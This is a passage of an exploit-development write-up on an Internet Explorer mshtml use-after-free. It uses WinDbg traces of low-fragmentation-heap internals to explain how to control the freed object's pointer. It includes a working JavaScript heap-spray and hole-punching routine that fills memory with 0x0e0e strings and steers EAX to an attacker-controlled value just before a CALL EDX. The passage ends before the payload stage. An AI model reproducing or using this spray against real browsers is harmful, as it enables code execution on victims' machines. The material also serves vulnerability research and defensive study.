002d6338 00000000 002d6340 00000062 00000000 ....@c-.b.......

002d6348 00000000 00000000 002d6328 00000000 ........(c-.....

002d6358 00000000 00000000 00000000 00000000 ................


dc ebx-8-0x4C ebx+0x4C+8+0x4C

002d62c4 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d62d4 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d62e4 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d62f4 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d6304 0c0c0c0c 00000c0c 00000000 3b93022c ............,..;

002d6314 80000000 002e00a7 00000000 ffff404a ............J@..

002d6324 ffffffff 00000051 00000000 00000000 ....Q...........

002d6334 00000000 00000000 002d6340 00000062 ........@c-.b...

002d6344 00000000 00000000 00000000 002d6328 ............(c-.

002d6354 00000000 00000000 00000000 00000000 ................

002d6364 00000000 3b930223 88000000 00000046 ....#..;....F...
002d6374 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d6384 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d6394 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d63a4 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................

002d63b4 0c0c0c0c 00000c0c ........
 
As you can see, the contents of the chunks before and after ours are controlled by us, since we filled those 0x4C-sized objects with 0x0c0c0c0c. This gives us predictability about where our chunk is allocated (its relative offset) and about the offset value that is written. But a problem remains, one that will render useless our effort to control the first WORD of the pointer.

(6c0.4cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7fd6d1eb ebx=0036a530 ecx=003800a7 edx=00000000 esi=0228bd10 edi=00000000
eip=6987b68f esp=0228bce4 ebp=0228bcfc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6987b68f 8b5070 mov edx,dword ptr [eax+70h] ds:0023:7fd6d25b=????????


dc ebx l1
0036a530 003800a7


!heap -x ebx

Entry User Heap Segment Size PrevSize Unused Flags

-------------------------------------------------------

0036a528 0036a530 002b0000 00347878 58 - 0 LFH;free


dt nt!_HEAP_SUBSEGMENT 00347878

ntdll!_HEAP_SUBSEGMENT
 
+0x000 LocalInfo : 0x002b6f70 _HEAP_LOCAL_SEGMENT_INFO 
+0x004 UserBlocks : 0x00369f40 _HEAP_USERDATA_HEADER 
+0x008 AggregateExchg : _INTERLOCK_SEQ 
+0x010 BlockSize : 0xb
...


dt nt!_HEAP_BUCKET_COUNTERS 0x002b6f70+50

ntdll!_HEAP_BUCKET_COUNTERS
 
+0x000 TotalBlocks : 0x12b 
+0x004 SubSegmentCounts : 7 
+0x000 Aggregate64 : 0n30064771371

TotalBlocks only reports 0x12b blocks, which means that we won't have any offset recorded in the first WORD of the pointer beyond this value. Why? Because it is the sum of all chunks distributed across all 7 sub-segments (as indicated by SubSegmentCounts). Although we could push this value even higher, that would lead to an increase in heap allocations. So let's say that the only thing we can predict from this is that its value will always be a multiple of 0xb (0x58/8) plus 2. We could also force the chunk to the end of the list of a heap sub-segment cache, setting the WORD value to 0xffff, but that would gain us nothing either; more on this later.
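The "multiple of 0xb plus 2" rule can be checked against the offsets seen in the two crashes. A small sketch under the assumptions stated in the text (block size 0x58, offsets counted in 8-byte units, first block at offset 2); the helper name is hypothetical:

```python
BLOCK_UNITS = 0x58 // 8   # 0xb units per 0x58-byte block
FIRST_OFFSET = 2          # offset of the first block, per the text above


def block_index(free_entry_offset):
    """Index of the block a FreeEntryOffset points to, or None if it does not fit."""
    if free_entry_offset < FIRST_OFFSET:
        return None
    index, remainder = divmod(free_entry_offset - FIRST_OFFSET, BLOCK_UNITS)
    return index if remainder == 0 else None


# Low WORDs observed in the crashes above: 0x00a7 and 0x010a.
print(block_index(0x00A7), block_index(0x010A))
```

Both observed offsets fall exactly on a block boundary, which is consistent with the rule.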

dt -a nt!_HEAP_SUBSEGMENT 0x002b6f70+8
ntdll!_HEAP_SUBSEGMENT

[0] @ 002b6f78

---------------------------------------------
 
+0x000 LocalInfo : 0x03c3e1c0 _HEAP_LOCAL_SEGMENT_INFO 
+0x004 UserBlocks : 0x03c3e1a0 _HEAP_USERDATA_HEADER
...

[1] @ 002b6f98

---------------------------------------------
 
+0x000 LocalInfo : 0x00347878 _HEAP_LOCAL_SEGMENT_INFO 
+0x004 UserBlocks : 0x002bdaf0 _HEAP_USERDATA_HEADER
...


Considering this, from this point on I'll diverge from the original exploit code, because I want to improve the exploit by making it more resilient, so keep reading.

We now know that the value we're targeting lies within the heap segment that manages chunks of size 0xE8 (where the CObjectElement resides) and that we can't control the low WORD (the last four hex digits) of the address. Or can we?
All that seems left for predictability at this point is to try to fill a heap sub-segment with strings sized 0xE8, and place the CObjectElement right in the middle or at the end of this string-sprayed memory area, so that we can profit from the first WORD of its address. We need the last CObjectElement created to land in a filled sub-segment and not in a new sub-segment, where there won't be any string content. So, with 0xffff being the maximum block count of a sub-segment, we can have, per sub-segment, a total of 2259 chunks of size 0xe8.

?ffff*8/e8
Evaluate expression: 2259 = 000008d3
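The same calculation can be reproduced outside the debugger. A minimal sketch, assuming (as the text does) a limit of 0xffff blocks of 8 bytes per sub-segment; `maxChunksPerSubSegment` is a hypothetical name used only here.

```javascript
// Assumption from the text: at most 0xffff blocks of 8 bytes each
// can be addressed inside one sub-segment.
var MAX_BLOCKS = 0xffff;
var GRANULARITY = 8;

// Hypothetical helper: number of whole chunks of chunkBytes that fit.
function maxChunksPerSubSegment(chunkBytes) {
  return Math.floor((MAX_BLOCKS * GRANULARITY) / chunkBytes);
}

var n = maxChunksPerSubSegment(0xe8);
console.log(n + " = 0x" + n.toString(16)); // 2259 = 0x8d3
```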

 
Say we allocate 2259 string objects of size 0xE8: the first WORD of the freed CTreeNode object will have a value between 0x2 and 0xffff, so our pointer might land anywhere within the full address range of the segment:

0xXXXX[0x2-0xffff]

But if we force the use of a caching sub-segment, the address range is heavily reduced, although we can't predict what we'll get as the first WORD. Forcing cache usage is as simple as allocating a large number of string chunks of size 0xE8 and freeing a small number of the most recently allocated ones; the freed strings will fill up the cache and be reused by the time the CObjectElement is created.
But what happens if, by chance, we hit a point in time where the caches are empty? The object will be allocated from an active sub-segment, and we're back to square one, as can be seen in the following example trace:

CObjectElement:addr[028a4f80]
CTreeNode:node[00450080] Type:028a4f80 CObjectElement::`vftable'

eax=00450080 ebx=00457f70 ecx=00450080 edx=00000000 esi=0046f428 edi=028a4f80
eip=6dbd47b9 esp=021fc5d8 ebp=021fc5f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTreeNode::CTreeNode:
6dbd47b9 8bff mov edi,edi


dc 00450080

00450080 00000000 00000000 00000000 00000000 ................


ba w4 00450080


dc 00450080

00450080 028a4f80 00000000 ffff0000 ffffffff .O..............


!heap -x 028a4f80

Entry User Heap Segment Size PrevSize Unused Flags

-----------------------------------------------------

028a4f78 028a4f80 003d0000 00450d68 e8 - 8 LFH;busy


dt nt!_heap_subsegment 00450d68


ntdll!_HEAP_SUBSEGMENT
 
+0x000 LocalInfo : 0x003d76c0 _HEAP_LOCAL_SEGMENT_INFO 
+0x004 UserBlocks : 0x028a2048 _HEAP_USERDATA_HEADER 
+0x008 AggregateExchg : _INTERLOCK_SEQ 
+0x010 BlockSize : 0x1d 
+0x012 Flags : 0 
+0x014 BlockCount : 0x46 
+0x016 SizeIndex : 0x1c '' 
+0x017 AffinityIndex : 0 '' 
+0x010 Alignment : [2] 0x1d 
+0x018 SFreeListEntry : _SINGLE_LIST_ENTRY 
+0x01c Lock : 7

dt nt!_INTERLOCK_SEQ 00450d68+8

ntdll!_INTERLOCK_SEQ
 
+0x000 Depth : 0x11 
+0x002 FreeEntryOffset : 0x603 
+0x000 OffsetAndDepth : 0x6030011  
+0x004 Sequence : 0xff425ade 
+0x000 Exchg : 0n-53380335944925167

dt nt!_HEAP_LOCAL_SEGMENT_INFO 0x003d76c0

ntdll!_HEAP_LOCAL_SEGMENT_INFO
 
+0x000 Hint : (null) 
+0x004 ActiveSubsegment : 0x00450d68 _HEAP_SUBSEGMENT 
+0x008 CachedItems : [16] (null) 
+0x048 SListHeader : _SLIST_HEADER 
+0x050 Counters : _HEAP_BUCKET_COUNTERS 
+0x058 LocalData : 0x003d6b48 _HEAP_LOCAL_DATA 
+0x05c LastOpSequence : 0x87 
+0x060 BucketIndex : 0x1c 
+0x062 LastUsed : 0


The allocation of the CObjectElement is being retrieved from the active sub-segment.
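The _INTERLOCK_SEQ values in the trace can be decoded by hand to double-check this. The sketch below only re-does the arithmetic on numbers copied from the debugger output; it assumes FreeEntryOffset counts 8-byte units from UserBlocks, and under that assumption the next free chunk sits immediately after the CObjectElement.

```javascript
// Values copied from the trace above.
var offsetAndDepth = 0x06030011;  // _INTERLOCK_SEQ.OffsetAndDepth
var userBlocks     = 0x028a2048;  // _HEAP_SUBSEGMENT.UserBlocks
var chunkEntry     = 0x028a4f78;  // heap entry of the CObjectElement
var chunkBytes     = 0xe8;

// Low WORD is Depth, high WORD is FreeEntryOffset (see the dt output).
var depth           = offsetAndDepth & 0xffff;
var freeEntryOffset = offsetAndDepth >>> 16;

// Assumption: FreeEntryOffset counts 8-byte units from UserBlocks.
var nextFree = userBlocks + freeEntryOffset * 8;

function hex(v) { return "0x" + v.toString(16); }
console.log(hex(depth), hex(freeEntryOffset));            // 0x11 0x603
console.log(hex(nextFree), hex(chunkEntry + chunkBytes)); // 0x28a5060 0x28a5060
```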
Can we get the best of both worlds? I think we can. Freeing strings increases our chances of heap cache usage, and since freeing a string does not alter its content, we'll allocate a full segment and then free a portion of it by de-allocating every other string near the end of the array. This will leave the heap in the following state:

When IE allocates the CObjectElement it will end up in one of these holes, surrounded by 0x0e0e0e0e strings.
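The intended layout can be modelled abstractly before looking at the actual spray. This is only a toy model, assuming the array order mirrors the order of chunks in the heap (which the real allocator does not guarantee); `punchHoles` is a hypothetical name, and the numbers match the ones used in the exploit (2000 strings, the last 100 thinned out).

```javascript
// Hypothetical model: one slot per sprayed string, true = still allocated.
function punchHoles(total, tail) {
  var slots = [];
  for (var i = 0; i < total; i++) { slots.push(true); }
  // Free every other slot among the last `tail` entries.
  for (var j = total - tail; j < total; j += 2) { slots[j] = false; }
  return slots;
}

var slots = punchHoles(2000, 100);
var holes = 0;
var surrounded = true;
for (var k = 0; k < slots.length; k++) {
  if (!slots[k]) {
    holes++;
    // A hole is useful only if both neighbours still hold string data.
    if (slots[k - 1] !== true || slots[k + 1] !== true) { surrounded = false; }
  }
}
console.log(holes, surrounded); // 50 true
```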

The code:

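  // Length chosen so each string occupies an 0xe0-byte allocation (0xe8 chunk).
  var size1 = (0xe0/2)-3;
  var arrSize1 = 2000;
  var obj_overwrite2 = unescape("%u0e0e");
  // Grow the 0x0e0e pattern by doubling, then trim it to the exact length.
  while(obj_overwrite2.length < size1)
    { obj_overwrite2 += obj_overwrite2; }
  obj_overwrite2 = obj_overwrite2.substr(0, size1);
  // Spray: substr() is used so that each slot gets its own string allocation.
  var arr2 = new Array();
  for(var counter1 = 0; counter1 < arrSize1; counter1++)
    { arr2[counter1] = obj_overwrite2.substr(0, size1); }
  // Punch holes: release every other string among the last 100.
  for(var counter1 = arrSize1-100; counter1 < arrSize1; counter1+=2)
    {
      delete arr2[counter1];
      arr2[counter1] = null;
    }
  // Ask the JScript garbage collector to actually free the released strings.
  CollectGarbage();
  // The new object element is expected to land in one of the holes.
  document.body.innerHTML += "<object align='right' width='1000'>TAG_1</object>";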
...
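The `size1` expression in the snippet above can be sanity-checked with a few lines. This is a sketch under the assumption that JScript stores strings as BSTRs (4-byte length prefix, 2 bytes per character, 2-byte terminator) and that a heap entry carries an 8-byte header on this 32-bit target; `charsForUserSize` is a hypothetical helper.

```javascript
// Assumption: BSTR layout = 4-byte length prefix + 2 bytes per
// character + 2-byte null terminator.
var BSTR_OVERHEAD = 4 + 2;
// Assumption: 8-byte heap entry header on a 32-bit process.
var HEAP_ENTRY_HEADER = 8;

// Hypothetical helper: characters needed to fill a user allocation
// of userBytes bytes exactly.
function charsForUserSize(userBytes) {
  return (userBytes - BSTR_OVERHEAD) / 2;
}

var chars = charsForUserSize(0xe0);
console.log(chars === (0xe0 / 2) - 3);                       // true
console.log("0x" + (0xe0 + HEAP_ENTRY_HEADER).toString(16)); // 0xe8
```

This lines up with the `!heap -flt s e0` listing below, where every sprayed string shows a user size of 0xe0.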

ModLoad: 6e010000 6e0c2000 C:\Windows\System32\jscript.dll

(920.e14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0e0e0e0e ebx=00126d18 ecx=01d40115 edx=00000000 esi=022bbc00 edi=00000000
eip=6c64b68f esp=022bbbd4 ebp=022bbbec iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6c64b68f 8b5070 mov edx,dword ptr [eax+70h] ds:0023:0e0e0e7e=????????


dc ebx
00126d18 01d40115 00000000 ffff404a ffffffff ........J@......

dc 01d40115
01d40115 0e0e0e0e 0e0e0e0e 0e0e0e0e 0e0e0e0e ................

!heap -x 01d40115

Entry User Heap Segment Size PrevSize Unused Flags

----------------------------------------------------

01d400d8 01d400e0 00070000 0010e408 e8 - 8 LFH;busy




!heap -flt s e0 
_HEAP @ 70000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state  
01d400d8 001d 001d [00] 01d400e0 000e0 - (busy) 
01d401c0 001d 001d [00] 01d401c8 000e0 - (busy) 
01d402a8 001d 001d [00] 01d402b0 000e0 - (busy) 
01d40390 001d 001d [00] 01d40398 000e0 - (busy) 
01d40478 001d 001d [00] 01d40480 000e0 - (busy) 
01d40560 001d 001d [00] 01d40568 000e0 - (busy)
...

01d48a20 001d 001d [00] 01d48a28 000e0 - (busy) 
01d48b08 001d 001d [00] 01d48b10 000e0 - (busy)
...
 
01d4f7c8 001d 001d [00] 01d4f7d0 000e0 - (busy) 
01d4f8b0 001d 001d [00] 01d4f8b8 000e0 - (free)  
01d4f998 001d 001d [00] 01d4f9a0 000e0 - (busy) 
01d4fa80 001d 001d [00] 01d4fa88 000e0 - (free) 
01d4fb68 001d 001d [00] 01d4fb70 000e0 - (busy) 
01d4fc50 001d 001d [00] 01d4fc58 000e0 - (free) 
01d4fd38 001d 001d [00] 01d4fd40 000e0 - (busy) 
01d4fe20 001d 001d [00] 01d4fe28 000e0 - (free)  
01d4ff08 001d 001d [00] 01d4ff10 000e0 - (busy) 
01d4fff0 001d 001d [00] 01d4fff8 000e0 - (free)

dt ntdll!_HEAP_SUBSEGMENT 0010e408
 
+0x000 LocalInfo : 0x000776c0 _HEAP_LOCAL_SEGMENT_INFO
+0x004 UserBlocks : 0x01d38a10 _HEAP_USERDATA_HEADER
+0x008 AggregateExchg : _INTERLOCK_SEQ 
+0x010 BlockSize : 0x1d 
+0x012 Flags : 0 
+0x014 BlockCount : 0x8d 
+0x016 SizeIndex : 0x1c '' 
+0x017 AffinityIndex : 0 '' 
+0x010 Alignment : [2] 0x1d 
+0x018 SFreeListEntry : _SINGLE_LIST_ENTRY 
+0x01c Lock : 1

As you can see above, the full address range covered by the base address 0x01d4XXXX is filled with our string content. Although this is no guarantee of a working exploit, it greatly increases the probability of successful exploitation. So EAX is now 0x0e0e0e0e, and EDX will hold the value at [0x0e0e0e0e+0x70].
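The two observations can be verified against the numbers in the crash trace. A small sketch using only values copied from the debugger output above; the helper `hex32` is just for printing.

```javascript
// Formats a number as an 8-digit hexadecimal address.
function hex32(v) {
  return "0x" + ("00000000" + (v >>> 0).toString(16)).slice(-8);
}

// Values copied from the debugger output above.
var danglingPtr = 0x01d40115; // first DWORD at ebx
var chunkUser   = 0x01d400e0; // user pointer reported by !heap -x
var chunkSize   = 0xe0;       // user size of each sprayed string

// The pointer must fall inside a sprayed string for EAX to become 0x0e0e0e0e.
var insideSpray = danglingPtr >= chunkUser &&
                  danglingPtr < chunkUser + chunkSize;

var eax = 0x0e0e0e0e;
var edxSource = eax + 0x70;   // operand of mov edx,dword ptr [eax+70h]

console.log(insideSpray, hex32(edxSource)); // true 0x0e0e0e7e
```

The computed address matches the faulting operand ds:0023:0e0e0e7e in the access violation.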

Since the next instruction in the execution stream is CALL EDX, you know where we're going from here… Stage 2.

I hope you enjoyed it.

Everything is possible when a man wants it (and the woman allows it).